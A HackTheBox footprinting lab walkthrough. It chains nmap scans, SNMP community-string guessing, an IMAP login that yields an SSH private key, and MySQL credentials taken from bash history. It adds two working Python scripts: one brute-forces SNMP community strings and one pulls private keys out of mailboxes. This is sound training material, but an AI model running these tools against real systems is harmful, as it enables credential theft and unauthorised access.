Footprinting Lab Hard
ℹ️ Information
- 🌐 Website: HackTheBox
- 📚 Module: Footprinting
- 🔗 Link: Footprinting Lab Hard
❓ Question
Enumerate the server carefully and find the username "HTB" and its password. Then, submit HTB's password as the answer.
📋 Walkthrough
Start with a fast full-port scan with nmap, then run a default-script and version scan (-sCV) against the ports it finds open:
nmap -p- --min-rate=10000 10.129.132.182
PORT STATE SERVICE
22/tcp open ssh
110/tcp open pop3
143/tcp open imap
993/tcp open imaps
995/tcp open pop3s
nmap -p 22,110,143,993,995 -sCV 10.129.132.182
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
110/tcp open pop3 Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_pop3-capabilities: CAPA TOP USER SASL(PLAIN) UIDL RESP-CODES STLS PIPELINING AUTH-RESP-CODE
143/tcp open imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: ENABLE more STARTTLS LOGIN-REFERRALS SASL-IR Pre-login OK post-login IDLE have LITERAL+ listed capabilities AUTH=PLAINA0001 ID IMAP4rev1
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: ENABLE more AUTH=PLAINA0001 SASL-IR Pre-login OK post-login IDLE have LITERAL+ listed capabilities ID LOGIN-REFERRALS IMAP4rev1
995/tcp open ssl/pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_pop3-capabilities: SASL(PLAIN) CAPA UIDL RESP-CODES TOP USER PIPELINING AUTH-RESP-CODE
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Then a UDP scan:
sudo nmap -sU 10.129.132.182
Not shown: 993 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
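Port 161/udp is open, so the next step is guessing the community string. What follows is an added Python example and not part of the original walkthrough: it hand-builds an SNMPv1 GetRequest for sysDescr.0 with a minimal BER encoder and checks whether the agent answers at all, because SNMP agents silently drop requests carrying a wrong community, so any well-formed GetResponse is a hit. The target address and the candidate list (including "backup", the string the lab description hints at) are assumptions for illustration; snmpwalk -v1 -c <string> does the same check by hand once a candidate works.

```python
"""Added example: probe SNMPv1 community strings with hand-built packets (not from the lab)."""
import socket

SYS_DESCR_0 = (1, 3, 6, 1, 2, 1, 1, 1, 0)  # sysDescr.0, answered by every agent
GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2       # SNMP PDU tags


def ber_len(n: int) -> bytes:
    """BER definite-form length: one byte below 128, otherwise 0x80|count followed by big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(content)) + content


def encode_int(value: int) -> bytes:
    """INTEGER in minimal two's-complement form (128 needs two bytes: 00 80)."""
    size = 1
    while not -(1 << (8 * size - 1)) <= value < (1 << (8 * size - 1)):
        size += 1
    return tlv(0x02, value.to_bytes(size, "big", signed=True))


def encode_oid(oid) -> bytes:
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128 with continuation bits."""
    out = bytearray([40 * oid[0] + oid[1]])
    for arc in oid[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))


def build_get_request(community: str, oid=SYS_DESCR_0, request_id: int = 1) -> bytes:
    """SNMPv1 message: SEQUENCE { version 0, community, GetRequest { id, 0, 0, varbinds } }."""
    varbind = tlv(0x30, encode_oid(oid) + b"\x05\x00")  # name + NULL placeholder value
    pdu = tlv(GET_REQUEST, encode_int(request_id) + encode_int(0) + encode_int(0) + tlv(0x30, varbind))
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + pdu)


def read_tlv(buf: bytes, pos: int = 0):
    """Return (tag, content, position after this element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        count = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + count], "big"), pos + count
    return tag, buf[pos:pos + length], pos + length


def is_get_response(datagram: bytes, community: str, request_id: int) -> bool:
    """True if the datagram is a GetResponse to our request; any reply means the community was accepted."""
    try:
        tag, msg, _ = read_tlv(datagram)
        if tag != 0x30:
            return False
        _, _version, pos = read_tlv(msg)
        _, comm, pos = read_tlv(msg, pos)
        pdu_tag, pdu, _ = read_tlv(msg, pos)
        _, rid, _ = read_tlv(pdu)
        return (pdu_tag == GET_RESPONSE and comm == community.encode()
                and int.from_bytes(rid, "big", signed=True) == request_id)
    except (IndexError, ValueError):
        return False


def try_communities(host: str, candidates, port: int = 161, timeout: float = 1.0):
    """Send one GetRequest per candidate; wrong communities get no answer, so a valid reply is a hit."""
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        for rid, community in enumerate(candidates, start=1):
            sock.sendto(build_get_request(community, request_id=rid), (host, port))
            try:
                data, _ = sock.recvfrom(65535)
            except socket.timeout:
                continue
            if is_get_response(data, community, rid):
                hits.append(community)
    return hits


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.129.132.182"  # assumed lab address
    # "backup" is the string the lab description hints at; the others are common defaults.
    print(try_communities(target, ["public", "private", "backup", "manager"]))
```

The request-id is incremented per candidate so a late reply to an earlier probe cannot be credited to the wrong string; keep the candidate list short and the timeout generous, since UDP gives no distinction between "wrong community" and "packet lost".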
Try snmpwalk with the public community string, but no luck. We could enumerate community strings with a wordlist, but the challenge description says this is a backup server. Maybe the community string is backup? Yes! With it we can find credentials in the output. Are they for SSH? No, user tom can't log in over SSH with them. Try logging in to IMAP with Evolution instead. In the mailbox there is an email containing an SSH private key. Save it with mode 600 (ssh -i refuses a key readable by other users) and we can use it to log in as tom. We are in! I notice that .bash_history has some information: there is a mysql login command in it. Trying the same credentials as for IMAP, it works!
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| users |
+--------------------+
5 rows in set (0.01 sec)
mysql> use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| users |
+-----------------+
Query the users table for the HTB user to get the password.
Answer
[REDACTED]
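The mailbox step above (log in to IMAP as tom and pull the SSH private key out of a message) can also be done without a GUI client. This is an added Python example, not code from the original walkthrough: it logs in over STARTTLS on 143 (the same Dovecot also offers implicit TLS on 993), fetches every message, carves any PEM private-key block out of the body text or attachments, and writes it with mode 0600 so ssh -i accepts it. The sample message, its sender and recipient addresses and the key material inside it are constructed for the offline check and are not from the lab.

```python
"""Added example: fetch mail over IMAP and carve out SSH private keys (not from the lab)."""
import email
import imaplib
import os
import re
import ssl
from email.message import EmailMessage

# Any PEM-style private key: OpenSSH, RSA, EC, DSA or PKCS#8 ("PRIVATE KEY").
KEY_BLOCK = re.compile(
    rb"-----BEGIN [A-Z ]*PRIVATE KEY-----\r?\n.*?\r?\n-----END [A-Z ]*PRIVATE KEY-----",
    re.DOTALL,
)

# Constructed key material for the offline check; the base64 body is filler, not a real key.
SAMPLE_KEY = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----\n"
    b"QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB\n"
    b"-----END OPENSSH PRIVATE KEY-----\n"
)


def find_private_keys(raw_message: bytes) -> list:
    """Return every private-key block in a raw RFC822 message, from body text or attachments."""
    msg = email.message_from_bytes(raw_message)
    keys = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True)  # undoes base64 / quoted-printable
        if not payload:
            continue
        for match in KEY_BLOCK.finditer(payload):
            keys.append(match.group(0).replace(b"\r\n", b"\n") + b"\n")
    return keys


def save_key(key: bytes, path: str) -> str:
    """Create the file with mode 0600 up front; ssh -i refuses a key that other users can read."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(key)
    return path


def fetch_raw_messages(host: str, user: str, password: str, port: int = 143, mailbox: str = "INBOX"):
    """Log in with STARTTLS on 143 (for 993 use imaplib.IMAP4_SSL instead) and return raw messages."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False        # the lab host presents a self-signed cert for NIXHARD
    ctx.verify_mode = ssl.CERT_NONE
    conn = imaplib.IMAP4(host, port)
    conn.starttls(ctx)
    conn.login(user, password)
    conn.select(mailbox, readonly=True)  # read-only: leave the mailbox as we found it
    _, data = conn.search(None, "ALL")
    raw = []
    for num in data[0].split():
        _, parts = conn.fetch(num, "(RFC822)")
        raw.append(parts[0][1])
    conn.logout()
    return raw


def build_sample_message() -> bytes:
    """Constructed message with the key as a base64 attachment, standing in for the one in the mailbox."""
    m = EmailMessage()
    m["From"], m["To"], m["Subject"] = "tom@nixhard", "tom@nixhard", "ssh key"  # assumed addresses
    m.set_content("Key for the box attached.\n")
    m.add_attachment(SAMPLE_KEY, maintype="application", subtype="octet-stream", filename="id_rsa")
    return m.as_bytes()


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 4:   # python imap_keys.py <host> <user> <password>
        messages = fetch_raw_messages(*sys.argv[1:4])
    else:                    # offline demo on the constructed message
        messages = [build_sample_message()]
    for i, raw in enumerate(messages):
        for j, key in enumerate(find_private_keys(raw)):
            print("saved", save_key(key, f"id_key_{i}_{j}"))
```

Certificate verification is disabled only because the lab box presents a self-signed certificate for NIXHARD; against anything that matters, pin or verify it instead. The regex deliberately ignores PUBLIC KEY and CERTIFICATE blocks so that only material usable with ssh -i is written to disk.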